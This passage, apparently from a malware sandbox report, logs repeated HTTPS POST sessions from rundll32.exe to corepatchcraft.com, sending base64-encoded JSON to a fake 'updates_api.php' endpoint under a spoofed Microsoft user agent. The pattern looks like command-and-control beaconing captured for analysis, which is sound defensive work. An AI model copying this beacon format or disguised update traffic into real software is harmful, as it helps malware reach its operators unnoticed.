                        2025-01-16 05:03:22 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:23 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:23 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:23 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        65192.168.2.66444294.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:24 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:24 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:24 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:24 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:24 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        66192.168.2.66444394.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:25 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:25 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:26 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:25 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:26 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        67192.168.2.66444494.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:27 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:27 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:27 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:27 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:27 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        68192.168.2.66444594.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:28 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:28 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:28 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:28 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:28 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        69192.168.2.66444894.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:29 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:29 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:30 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:30 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:30 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        70192.168.2.66444994.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:31 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:31 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:31 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:31 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:31 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        71192.168.2.66445094.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:32 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:32 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:32 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:32 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:32 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        72192.168.2.66445194.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:33 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:33 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:34 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:34 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:34 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        73192.168.2.66445294.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:35 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:35 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:35 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:35 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:35 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        74192.168.2.66445394.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:36 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
                        2025-01-16 05:03:36 UTC249OUTData Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 49 54 69 74 4f 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6b 67 72 62 6e 6c 48 53 33 64 68 52 6a 6c 70 51 55 35 6c 4d 33 46 70 61 30 31 47 55 56 70 4e 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 50 5a 55 64 6a 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6b 78 4e 56 31 5a 51 55 54 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6b 68 4e 54 33 68 51 4c 31 46 46 5a 54 5a 78 52 45 34 30 5a 6a 4d 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 48 4f 44 5a 35 54 69 39 5a 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6b 64 61 51 30 52 44 5a 6b 5a 61 54 57 5a 59 59 57 52 51 56 31 56 33 55 56 49 76 54 69 39 4d 4d 30 74 54 4d 31 49 7a 65 54 4a 50 53 55 34 32 64 6e 67 72 63 48 4e 78 4e 6e 4d 39 49 6e 30 3d
                        Data Ascii: data=eyJDS3oiOiJITitOIiwiRnN0TCI6IkgrbnlHS3dhRjlpQU5lM3Fpa01GUVpNPSIsInZZdEIiOiJPZUdjIiwidm9KYyI6IkxNV1ZQUT09Iiwid0FjSCI6IkhNT3hQL1FFZTZxRE40ZjMiLCJ4ZUNjalMiOiJHODZ5Ti9ZPSIsInlpaVVYWSI6IkdaQ0RDZkZaTWZYYWRQV1V3UVIvTi9MM0tTM1IzeTJPSU42dngrcHNxNnM9In0=
                        2025-01-16 05:03:36 UTC217INHTTP/1.1 200 OK
                        Date: Thu, 16 Jan 2025 05:03:36 GMT
                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                        X-Powered-By: PHP/8.2.12
                        Content-Length: 20
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        2025-01-16 05:03:36 UTC20INData Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 50 5a 55 64 6a 49 6e 30 3d
                        Data Ascii: eyJUUGQiOiJPZUdjIn0=


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        75192.168.2.66445494.159.113.2134432800C:\Windows\SysWOW64\rundll32.exe
                        TimestampBytes transferredDirectionData
                        2025-01-16 05:03:37 UTC250OUTPOST /updates/system-components/2025-release/updates_api.php HTTP/1.1
                        User-Agent: Microsoft-WNS/10.0
                        Content-Type: application/x-www-form-urlencoded
                        Accept-Language: fr-CA
                        Host: corepatchcraft.com
                        Content-Length: 249
                        Cache-Control: no-cache
